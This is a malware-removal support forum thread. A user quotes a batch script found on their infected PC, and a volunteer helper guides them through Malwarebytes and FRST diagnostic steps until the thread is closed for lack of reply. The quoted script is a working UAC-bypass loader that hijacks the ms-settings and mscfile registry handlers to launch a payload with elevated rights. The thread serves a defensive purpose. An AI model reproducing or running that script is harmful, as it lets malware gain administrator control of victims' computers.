Jump to content

weird malware on pc that wont leave


Recommended Posts

so I scanned with malwarebytes and not even 15 mins later this happens
random extractor opens and malwarebyte's is removed
meaning it has bypassed malwarebytes?

idk some help would be great

https://imgur.com/a/9fpbTNI

here is the code of the malware in the .bat  [ this and a .vbs + the service.exe keeps appearing ] 
 

 

	@echo off
set PAYLOAD=C:\Users\Public\Documents\Service.exe
	
net session >nul 2>&1 || goto :label
%PAYLOAD%
exit /b 2
	
:label
whoami /groups|findstr /i "\<S-1-5-32-544\>" >nul 2>&1
if ERRORLEVEL 1 exit /b 1
	
for /f "tokens=4-5 delims=. " %%i in ('ver') do set WIN_VER=%%i.%%j
	set key="HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System"
for /f "skip=2 tokens=3" %%U in ('REG QUERY %key% /v ConsentPromptBehaviorAdmin') do set /a "UAC=%%U"
	
if %UAC% equ 2 exit /b 1
if %UAC% equ 5 (
    for %%V in (6.1 6.2 6.3) do if "%WIN_VER%" == "%%V" call :exploit mscfile CompMgmtLauncher.exe %PAYLOAD%
    if "%WIN_VER%" == "10.0" call :exploit ms-settings ComputerDefaults.exe %PAYLOAD%
)>nul 2>&1
if %UAC% equ 0 powershell -c Start-Process "%PAYLOAD%" -Verb runas
	exit /b 0
	:exploit <key> <trigger> <payload>
set regPath="HKCU\Software\Classes\%1\shell\open\command"
reg add %regPath% /d "%~3" /f
reg add %regPath% /v DelegateExecute /f
%~2
reg delete "HKCU\Software\Classes\%1" /f
exit /b
 
	

 

I tried to use my own code to remove it but it keeps appearing ;P 

Link to post
Share on other sites

Hello @maltastic  and  :welcome:

 

My name is MKDB and I will assist you.

 

 

Let's keep these principles as we proceed. Make sure to read the entire post below first.

  • Please follow the steps in the given order and post back the log files.
  • Please attach all log files into your post.
  • Before we start, please make sure that you have an external backup, not connected to this system, of all private data.
  • Only run the tools I guide you to. Please don't run any other scans, download, install or uninstall any programs while I'm working with you.
  • As English is not my native language, please do not use slang or idioms. It may be hard for me to understand.
  • If you do not respond within 4 days, your topic will be closed.
  • Cracked or hacked or pirated programs are not only illegal, but also will make a computer a malware victim. Having such programs installed, is the easiest way to get infected. It is the leading cause of ransomware encryptions. It is at times also a big source of current trojan infections. If you are running any kin of illegal software on your system, please uninstall them now, before we start the cleaning procedure.

 

 

 

We will start with MBST to get an overview of your system.

 

  • Please download the Malwarebytes Support Tool (MBST).
  • Run MBST and accept license agreement.
  • In the left navigation pane of MBST, click Advanced.
  • In the Advanced Options, click Gather Logs. A status diagram displays the tool is Getting logs from your machine.
  • A zip file named mbst-grab-results.zip will be saved to your desktop, please upload that file on your next reply.
Link to post
Share on other sites

6 hours ago, MKDB said:

Hello @maltastic  and  :welcome:

 

My name is MKDB and I will assist you.

 

 

Let's keep these principles as we proceed. Make sure to read the entire post below first.

  • Please follow the steps in the given order and post back the log files.
  • Please attach all log files into your post.
  • Before we start, please make sure that you have an external backup, not connected to this system, of all private data.
  • Only run the tools I guide you to. Please don't run any other scans, download, install or uninstall any programs while I'm working with you.
  • As English is not my native language, please do not use slang or idioms. It may be hard for me to understand.
  • If you do not respond within 4 days, your topic will be closed.
  • Cracked or hacked or pirated programs are not only illegal, but also will make a computer a malware victim. Having such programs installed, is the easiest way to get infected. It is the leading cause of ransomware encryptions. It is at times also a big source of current trojan infections. If you are running any kin of illegal software on your system, please uninstall them now, before we start the cleaning procedure.

 

 

 

We will start with MBST to get an overview of your system.

 

  • Please download the Malwarebytes Support Tool (MBST).
  • Run MBST and accept license agreement.
  • In the left navigation pane of MBST, click Advanced.
  • In the Advanced Options, click Gather Logs. A status diagram displays the tool is Getting logs from your machine.
  • A zip file named mbst-grab-results.zip will be saved to your desktop, please upload that file on your next reply.

I think this is it?

mbst-grab-results.zip

Link to post
Share on other sites

@maltastic

Did you install Honeygain intentionally / on your own?

 

What can you tell me about these files? Are you aware of them?

2024-02-18 06:22 - 2024-02-18 06:22 - 000001533 _____ C:\Users\Public\Documents\clean.py
2024-02-16 01:27 - 2024-02-16 02:34 - 000008669 _____ C:\Users\memes\Documents\ace.py
2024-02-15 23:16 - 2024-02-15 23:40 - 000004570 _____ C:\Users\memes\Documents\Working.py
2024-02-12 16:25 - 2024-02-12 16:25 - 000001301 _____ C:\Users\memes\Documents\ads.txt
2024-02-12 16:25 - 2024-02-12 16:25 - 000000107 _____ C:\Users\memes\Documents\key.txt
2024-02-06 19:23 - 2024-02-06 19:23 - 000000121 _____ C:\Users\memes\Documents\adfasdsadsad.txt

 

 

We will use Farbar Recovery Scan Tool (FRST) to run a fix. FRST was downloaded together with MBST and should be located in your download folder: C:\Users\memes\Downloads\FRSTEnglish.exe

The fix may take some time, please be very patient and do not interfere.

More steps will follow, so please stay with me.

 

 

  • Please download the attached fixlist.txt file and save it to your download folder, which is C:\users\memes\Downloads\ in your case.
  • You will find the file FRSTEnglish.exe (FRST) as well in this folder.

Note: It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

  • Close all open programs and save your work.
  • Run FRST.
  • Press the Fix button only once and wait. Please be patient and do not interfere, even if FRST does not respond for some time. That's nothing to worry about.
  • Please note: This Fix will remove all temporary files, empty recycle bin and will remove cookies and may result in some websites indicating they do not recognize your computer. It may be necessary to receive and apply a verification code.
  • Please note: This step resets your Firewall settings and you may be asked later to grant permission for legitimate programs to pass through the Firewall. If you recognize the program, agree to the request.
  • If the tool needs a restart, please make sure you let the system restart normally and let the tool complete its run after restart.
  • FRST will create one log now (Fixlog.txt) in the same directory the tool is run.
  • Please attach this logfile to your next reply.

 

 

fixlist.txt

Link to post
Share on other sites

13 hours ago, MKDB said:

@maltastic

Did you install Honeygain intentionally / on your own?

 

What can you tell me about these files? Are you aware of them?

2024-02-18 06:22 - 2024-02-18 06:22 - 000001533 _____ C:\Users\Public\Documents\clean.py
2024-02-16 01:27 - 2024-02-16 02:34 - 000008669 _____ C:\Users\memes\Documents\ace.py
2024-02-15 23:16 - 2024-02-15 23:40 - 000004570 _____ C:\Users\memes\Documents\Working.py
2024-02-12 16:25 - 2024-02-12 16:25 - 000001301 _____ C:\Users\memes\Documents\ads.txt
2024-02-12 16:25 - 2024-02-12 16:25 - 000000107 _____ C:\Users\memes\Documents\key.txt
2024-02-06 19:23 - 2024-02-06 19:23 - 000000121 _____ C:\Users\memes\Documents\adfasdsadsad.txt

 

 

We will use Farbar Recovery Scan Tool (FRST) to run a fix. FRST was downloaded together with MBST and should be located in your download folder: C:\Users\memes\Downloads\FRSTEnglish.exe

The fix may take some time, please be very patient and do not interfere.

More steps will follow, so please stay with me.

 

 

  • Please download the attached fixlist.txt file and save it to your download folder, which is C:\users\memes\Downloads\ in your case.
  • You will find the file FRSTEnglish.exe (FRST) as well in this folder.

Note: It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

  • Close all open programs and save your work.
  • Run FRST.
  • Press the Fix button only once and wait. Please be patient and do not interfere, even if FRST does not respond for some time. That's nothing to worry about.
  • Please note: This Fix will remove all temporary files, empty recycle bin and will remove cookies and may result in some websites indicating they do not recognize your computer. It may be necessary to receive and apply a verification code.
  • Please note: This step resets your Firewall settings and you may be asked later to grant permission for legitimate programs to pass through the Firewall. If you recognize the program, agree to the request.
  • If the tool needs a restart, please make sure you let the system restart normally and let the tool complete its run after restart.
  • FRST will create one log now (Fixlog.txt) in the same directory the tool is run.
  • Please attach this logfile to your next reply.

 

 

fixlist.txt 4.88 kB · 0 downloads

awesome I Will try this once I get home from work this morning 

will be a few hours as I am on nights right now

Link to post
Share on other sites

On 2/19/2024 at 3:46 PM, MKDB said:

@maltastic

Did you install Honeygain intentionally / on your own?

 

What can you tell me about these files? Are you aware of them?

2024-02-18 06:22 - 2024-02-18 06:22 - 000001533 _____ C:\Users\Public\Documents\clean.py
2024-02-16 01:27 - 2024-02-16 02:34 - 000008669 _____ C:\Users\memes\Documents\ace.py
2024-02-15 23:16 - 2024-02-15 23:40 - 000004570 _____ C:\Users\memes\Documents\Working.py
2024-02-12 16:25 - 2024-02-12 16:25 - 000001301 _____ C:\Users\memes\Documents\ads.txt
2024-02-12 16:25 - 2024-02-12 16:25 - 000000107 _____ C:\Users\memes\Documents\key.txt
2024-02-06 19:23 - 2024-02-06 19:23 - 000000121 _____ C:\Users\memes\Documents\adfasdsadsad.txt

 

 

We will use Farbar Recovery Scan Tool (FRST) to run a fix. FRST was downloaded together with MBST and should be located in your download folder: C:\Users\memes\Downloads\FRSTEnglish.exe

The fix may take some time, please be very patient and do not interfere.

More steps will follow, so please stay with me.

 

 

  • Please download the attached fixlist.txt file and save it to your download folder, which is C:\users\memes\Downloads\ in your case.
  • You will find the file FRSTEnglish.exe (FRST) as well in this folder.

Note: It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

  • Close all open programs and save your work.
  • Run FRST.
  • Press the Fix button only once and wait. Please be patient and do not interfere, even if FRST does not respond for some time. That's nothing to worry about.
  • Please note: This Fix will remove all temporary files, empty recycle bin and will remove cookies and may result in some websites indicating they do not recognize your computer. It may be necessary to receive and apply a verification code.
  • Please note: This step resets your Firewall settings and you may be asked later to grant permission for legitimate programs to pass through the Firewall. If you recognize the program, agree to the request.
  • If the tool needs a restart, please make sure you let the system restart normally and let the tool complete its run after restart.
  • FRST will create one log now (Fixlog.txt) in the same directory the tool is run.
  • Please attach this logfile to your next reply.

 

 

fixlist.txt 4.88 kB · 1 download

 

Fixlog.txt

Link to post
Share on other sites

@maltastic

Well done! Thank you for the logfile.

 

Please answer to my questions:

1) Did you install Honeygain intentionally / on your own?

2) What can you tell me about these files? Are you aware of them?

2024-02-18 06:22 - 2024-02-18 06:22 - 000001533 _____ C:\Users\Public\Documents\clean.py
2024-02-16 01:27 - 2024-02-16 02:34 - 000008669 _____ C:\Users\memes\Documents\ace.py
2024-02-15 23:16 - 2024-02-15 23:40 - 000004570 _____ C:\Users\memes\Documents\Working.py
2024-02-12 16:25 - 2024-02-12 16:25 - 000001301 _____ C:\Users\memes\Documents\ads.txt
2024-02-12 16:25 - 2024-02-12 16:25 - 000000107 _____ C:\Users\memes\Documents\key.txt
2024-02-06 19:23 - 2024-02-06 19:23 - 000000121 _____ C:\Users\memes\Documents\adfasdsadsad.txt

 

 

Let's run a fresh FRST scan to check the results:

  • Run FRST again.
  • Do not change any settings.
  • Press the Scan button.
  • FRST will create two logs now (FRST.txt + Addition.txt) in the same directory the tool is run.
  • Please attach these logfiles to your next reply.
Link to post
Share on other sites

Due to the lack of feedback, I do not follow this topic any longer.

If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this topic with your request.

This applies only to the originator of this thread. Other members who need assistance please start your own topic in a new thread.

Please review the following for Tips to help protect from infection.

Thank you.

Link to post
Share on other sites

Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.